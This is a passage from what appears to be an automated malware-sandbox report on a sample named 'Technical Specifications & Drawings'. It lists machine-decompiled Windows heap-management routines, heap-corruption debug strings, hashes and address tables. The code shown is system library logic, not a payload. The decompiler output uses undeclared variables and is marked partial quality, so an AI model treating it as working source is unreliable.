					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E017C7D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E01861582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E017FD5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}






























                                                  0x017ca229
                                                  0x017ca231
                                                  0x017ca23f
                                                  0x017ca242
                                                  0x017ca244
                                                  0x017ca24c
                                                  0x017ca255
                                                  0x017ca25a
                                                  0x017ca25f
                                                  0x01811c76
                                                  0x01811c78
                                                  0x01811c7e
                                                  0x01811c7f
                                                  0x01811c81
                                                  0x01811c82
                                                  0x01811c84
                                                  0x01811c89
                                                  0x01811c8b
                                                  0x01811c9e
                                                  0x01811c9e
                                                  0x01811cab
                                                  0x01811cb2
                                                  0x00000000
                                                  0x01811cb2
                                                  0x01811c8d
                                                  0x01811c92
                                                  0x00000000
                                                  0x00000000
                                                  0x01811c94
                                                  0x01811c98
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01811c98
                                                  0x017ca265
                                                  0x017ca265
                                                  0x017ca266
                                                  0x017ca26f
                                                  0x017ca270
                                                  0x017ca276
                                                  0x017ca277
                                                  0x017ca279
                                                  0x017ca27e
                                                  0x017ca282
                                                  0x01811db5
                                                  0x01811dbb
                                                  0x01811dc1
                                                  0x01811dc5
                                                  0x01811de4
                                                  0x01811de9
                                                  0x01811dc7
                                                  0x01811ddc
                                                  0x01811de1
                                                  0x01811def
                                                  0x01811df3
                                                  0x01811df7
                                                  0x01811dfe
                                                  0x01811e06
                                                  0x017ca302
                                                  0x017ca308
                                                  0x017ca308
                                                  0x017ca288
                                                  0x017ca28d
                                                  0x017ca294
                                                  0x01811cc1
                                                  0x017ca29a
                                                  0x017ca29a
                                                  0x017ca29a
                                                  0x017ca29f
                                                  0x01811ccb
                                                  0x01811cd1
                                                  0x01811cd8
                                                  0x01811cea
                                                  0x01811cea
                                                  0x01811cd8
                                                  0x017ca2a9
                                                  0x017ca2af
                                                  0x017ca2bc
                                                  0x01811cfd
                                                  0x017ca2c2
                                                  0x017ca2c2
                                                  0x017ca2c2
                                                  0x017ca2c7
                                                  0x01811d07
                                                  0x01811d0d
                                                  0x01811d14
                                                  0x01811d1f
                                                  0x01811d21
                                                  0x01811d2c
                                                  0x01811d2c
                                                  0x01811d2c
                                                  0x01811d47
                                                  0x01811d47
                                                  0x01811d14
                                                  0x017ca2cd
                                                  0x017ca2d2
                                                  0x017ca2d9
                                                  0x01811d5a
                                                  0x017ca2df
                                                  0x017ca2df
                                                  0x017ca2df
                                                  0x017ca2e4
                                                  0x01811d69
                                                  0x01811d6b
                                                  0x01811d76
                                                  0x01811d76
                                                  0x01811d76
                                                  0x01811d91
                                                  0x01811d91
                                                  0x017ca2ea
                                                  0x017ca2f0
                                                  0x017ca2f5
                                                  0x01811da8
                                                  0x01811dad
                                                  0x01811dad
                                                  0x017ca2fd
                                                  0x017ca300
                                                  0x00000000

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                  • API String ID: 2994545307-2586055223
                                                  • Opcode ID: 93e50f7063bf8f1ec4e017340f61d9874c4de75cf26d205a714300267850c325
                                                  • Instruction ID: e4285b900a3f1d50b82a18970ee995e805c9bb68a39cf0f28db732f6742338dd
                                                  • Opcode Fuzzy Hash: 93e50f7063bf8f1ec4e017340f61d9874c4de75cf26d205a714300267850c325
                                                  • Instruction Fuzzy Hash: 085106722056959FE722DB68C84CF67B7E9FF84B50F08056CF651CB292E724DA40CB62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018649A4 Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                  • API String ID: 2994545307-336120773
                                                  • Opcode ID: 5da75cc37793a3116dd0941c0884455c235083ae8fff5ff4a7246a1943d39562
                                                  • Instruction ID: eba1abe51a64da80aca31c531be46446931539ec34a35d6a106b20279c64cf4b
                                                  • Opcode Fuzzy Hash: 5da75cc37793a3116dd0941c0884455c235083ae8fff5ff4a7246a1943d39562
                                                  • Instruction Fuzzy Hash: 0231FE31240205FFD721DB9DD889F6EB7ECEB04726F24426AF505CB291E670AA40CA69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017C99BF Relevance: 4.3, Strings: 3, Instructions: 572COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 78%
                                                  			E017C99BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				signed int _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							E0185FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // -16
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							E0186A80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // -8
									_t286 = E017FD540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E017AB150();
										} else {
											E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E017AB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0x1896378 = 1;
											asm("int3");
											 *0x1896378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E017CA229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								E017CA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // -16
							E017CBC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // -16
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						E0186A80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E017CA229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								E017CA309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // -8
							_t262 = E017FD540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E017AB150();
								} else {
									E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E017AB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0x1896378 = 1;
									asm("int3");
									 *0x1896378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										E0185FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // -16
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										E0186A80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // -8
												_t197 = E017FD540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E017AB150();
													} else {
														E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
													E017AB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0x1896378 = 1;
														asm("int3");
														 *0x1896378 = 0;
													}
												}
											}
											_t394 = _a4;
											_t414[1] = 0;
											_t414[3] = 0;
											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E017CA229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										E017CA309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // -16
											E017CBC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // -16
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										E0186A80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // -8
												_t222 = E017FD540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E017AB150();
													} else {
														E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E017AB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0x1896378 = 1;
														asm("int3");
														 *0x1896378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E017CA229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										E017CA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // -16
											E017CBC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						E017CBC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}




















































































                                                  0x017c99ca
                                                  0x017c99cc
                                                  0x017c99df
                                                  0x017c99e3
                                                  0x017c99f8
                                                  0x017c99fb
                                                  0x017c99fb
                                                  0x00000000
                                                  0x017c9a48
                                                  0x017c9a48
                                                  0x017c9a4c
                                                  0x017c9a51
                                                  0x017c9a55
                                                  0x017c9a61
                                                  0x017c9a66
                                                  0x017c9a68
                                                  0x01811457
                                                  0x0181145c
                                                  0x0181145c
                                                  0x017c9a68
                                                  0x017c9a6e
                                                  0x017c9a71
                                                  0x017c9a74
                                                  0x017c9a76
                                                  0x01811466
                                                  0x01811469
                                                  0x01811469
                                                  0x0181146c
                                                  0x0181146e
                                                  0x01811471
                                                  0x01811474
                                                  0x01811477
                                                  0x01811479
                                                  0x0181159c
                                                  0x0181159c
                                                  0x0181159d
                                                  0x018115a6
                                                  0x018115ab
                                                  0x018115ab
                                                  0x00000000
                                                  0x018115ab
                                                  0x0181147f
                                                  0x01811481
                                                  0x00000000
                                                  0x00000000
                                                  0x0181148a
                                                  0x0181148d
                                                  0x01811493
                                                  0x01811495
                                                  0x018114c0
                                                  0x018114c0
                                                  0x018114c3
                                                  0x018114c6
                                                  0x018114c8
                                                  0x018114cb
                                                  0x018114cf
                                                  0x018114f2
                                                  0x018114f2
                                                  0x018114f5
                                                  0x018114f8
                                                  0x01811501
                                                  0x01811508
                                                  0x0181150b
                                                  0x0181150e
                                                  0x01811510
                                                  0x01811513
                                                  0x01811515
                                                  0x01811515
                                                  0x01811518
                                                  0x01811518
                                                  0x01811513
                                                  0x01811521
                                                  0x01811525
                                                  0x0181152a
                                                  0x0181152d
                                                  0x01811530
                                                  0x01811532
                                                  0x01811539
                                                  0x0181153d
                                                  0x0181155d
                                                  0x01811562
                                                  0x0181153f
                                                  0x01811555
                                                  0x0181155a
                                                  0x01811570
                                                  0x01811577
                                                  0x0181157c
                                                  0x01811582
                                                  0x01811585
                                                  0x01811589
                                                  0x0181158b
                                                  0x01811592
                                                  0x01811593
                                                  0x01811593
                                                  0x01811589
                                                  0x01811530
                                                  0x00000000
                                                  0x018114f8
                                                  0x018114d5
                                                  0x018114da
                                                  0x018114dc
                                                  0x00000000
                                                  0x018114de
                                                  0x018114e8
                                                  0x00000000
                                                  0x018114e8
                                                  0x01811497
                                                  0x01811497
                                                  0x018114a4
                                                  0x018114a4
                                                  0x018114a7
                                                  0x018114a9
                                                  0x018114ab
                                                  0x018114ab
                                                  0x0181149c
                                                  0x0181149e
                                                  0x018114a0
                                                  0x018114b0
                                                  0x018114b0
                                                  0x00000000
                                                  0x018114a2
                                                  0x018114a2
                                                  0x00000000
                                                  0x018114a2
                                                  0x018114a0
                                                  0x018114b3
                                                  0x018114bb
                                                  0x00000000
                                                  0x018114bb
                                                  0x01811495
                                                  0x017c9a7c
                                                  0x017c9a7c
                                                  0x017c9a7f
                                                  0x017c9a7f
                                                  0x017c9a82
                                                  0x017c9a84
                                                  0x017c9a87
                                                  0x017c9a8a
                                                  0x017c9a8d
                                                  0x017c9a8f
                                                  0x0181166a
                                                  0x0181166a
                                                  0x0181166b
                                                  0x01811674
                                                  0x00000000
                                                  0x01811674
                                                  0x017c9a95
                                                  0x017c9a97
                                                  0x00000000
                                                  0x00000000
                                                  0x017c9aa0
                                                  0x017c9aa3
                                                  0x017c9aa9
                                                  0x017c9aab
                                                  0x017c9ad7
                                                  0x017c9ad7
                                                  0x017c9ada
                                                  0x017c9add
                                                  0x017c9adf
                                                  0x017c9ae2
                                                  0x017c9ae6
                                                  0x017c9b22
                                                  0x017c9b27
                                                  0x017c9b29
                                                  0x00000000
                                                  0x017c9b2b
                                                  0x018115be
                                                  0x00000000
                                                  0x018115be
                                                  0x017c9b29
                                                  0x017c9ae8
                                                  0x017c9ae8
                                                  0x017c9aeb
                                                  0x017c9aee
                                                  0x018115cb
                                                  0x018115d2
                                                  0x018115d5
                                                  0x018115d7
                                                  0x018115da
                                                  0x018115dc
                                                  0x018115dc
                                                  0x018115dc
                                                  0x018115da
                                                  0x018115e5
                                                  0x018115e9
                                                  0x018115ee
                                                  0x018115f1
                                                  0x018115f3
                                                  0x018115f9
                                                  0x01811600
                                                  0x01811604
                                                  0x01811624
                                                  0x01811629
                                                  0x01811606
                                                  0x0181161c
                                                  0x01811621
                                                  0x01811637
                                                  0x0181163e
                                                  0x01811643
                                                  0x01811649
                                                  0x0181164c
                                                  0x01811650
                                                  0x01811656
                                                  0x0181165d
                                                  0x0181165e
                                                  0x0181165e
                                                  0x01811650
                                                  0x018115f3
                                                  0x017c9af4
                                                  0x017c9af7
                                                  0x017c9afc
                                                  0x017c9b00
                                                  0x017c9b04
                                                  0x017c9b08
                                                  0x017c9b14
                                                  0x017c99fe
                                                  0x017c9a04
                                                  0x017c9a07
                                                  0x00000000
                                                  0x017c9a29
                                                  0x0181169c
                                                  0x018116a0
                                                  0x018116a5
                                                  0x018116a9
                                                  0x018116b5
                                                  0x018116ba
                                                  0x018116bc
                                                  0x018116be
                                                  0x018116c3
                                                  0x018116c3
                                                  0x018116bc
                                                  0x018116c8
                                                  0x018116cc
                                                  0x0181181b
                                                  0x0181181b
                                                  0x0181181e
                                                  0x0181181e
                                                  0x01811821
                                                  0x01811823
                                                  0x01811826
                                                  0x01811829
                                                  0x0181182c
                                                  0x0181182e
                                                  0x01811688
                                                  0x01811688
                                                  0x01811689
                                                  0x0181168b
                                                  0x0181168c
                                                  0x0181168d
                                                  0x0181168f
                                                  0x01811692
                                                  0x00000000
                                                  0x01811692
                                                  0x01811834
                                                  0x01811836
                                                  0x00000000
                                                  0x00000000
                                                  0x0181183f
                                                  0x01811842
                                                  0x01811848
                                                  0x0181184a
                                                  0x01811875
                                                  0x01811875
                                                  0x01811878
                                                  0x0181187b
                                                  0x0181187d
                                                  0x01811880
                                                  0x01811884
                                                  0x018118a7
                                                  0x018118a7
                                                  0x018118aa
                                                  0x018118ad
                                                  0x018118b6
                                                  0x018118bd
                                                  0x018118c0
                                                  0x018118c3
                                                  0x018118c5
                                                  0x018118c8
                                                  0x018118ca
                                                  0x018118ca
                                                  0x018118cd
                                                  0x018118cd
                                                  0x018118c8
                                                  0x018118d5
                                                  0x018118da
                                                  0x018118df
                                                  0x018118e2
                                                  0x018118e5
                                                  0x018118e7
                                                  0x018118ee
                                                  0x018118f2
                                                  0x01811912
                                                  0x01811917
                                                  0x018118f4
                                                  0x0181190a
                                                  0x0181190f
                                                  0x01811925
                                                  0x0181192c
                                                  0x01811931
                                                  0x0181193a
                                                  0x0181193e
                                                  0x01811940
                                                  0x01811947
                                                  0x01811948
                                                  0x01811948
                                                  0x0181193e
                                                  0x018118e5
                                                  0x0181194f
                                                  0x01811952
                                                  0x01811956
                                                  0x0181195d
                                                  0x01811961
                                                  0x0181196d
                                                  0x00000000
                                                  0x0181196d
                                                  0x0181188a
                                                  0x0181188f
                                                  0x01811891
                                                  0x00000000
                                                  0x00000000
                                                  0x0181189d
                                                  0x00000000
                                                  0x0181189d
                                                  0x0181184c
                                                  0x01811859
